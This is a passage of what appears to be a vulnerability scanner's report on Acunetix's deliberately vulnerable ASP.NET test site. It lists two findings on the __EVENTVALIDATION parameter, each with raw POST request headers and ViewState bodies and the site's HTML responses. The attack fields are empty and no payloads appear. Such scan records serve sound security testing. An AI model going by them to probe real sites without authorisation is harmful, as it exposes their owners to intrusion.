vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1119 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,119 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8315&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgCAs%2BD2p9oIZGRkX73%2FN98tpI6TLAGvznB4KjjlF38%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLWhf%2BEBwLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gLC914%2FpSjBDFQMf23reIYHsZeQlw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:11:45 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgCAs+D2p9oIZGRkX73/N98tpI6TLAGvznB4KjjlF38=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWhf+EBwLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gLC914/pSjBDFQMf23reIYHsZeQlw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:White" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8212&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAJ9AGV9oIZGRkaaPNzWXIhicmCNoGmnzqZBqwbtQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLWqPLxAwK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2BNnirVnoTbqijxyVHHWFSd5OqMRg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:44:00 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAJ9AGV9oIZGRkaaPNzWXIhicmCNoGmnzqZBqwbtQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWqPLxAwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+NnirVnoTbqijxyVHHWFSd5OqMRg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:White" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their 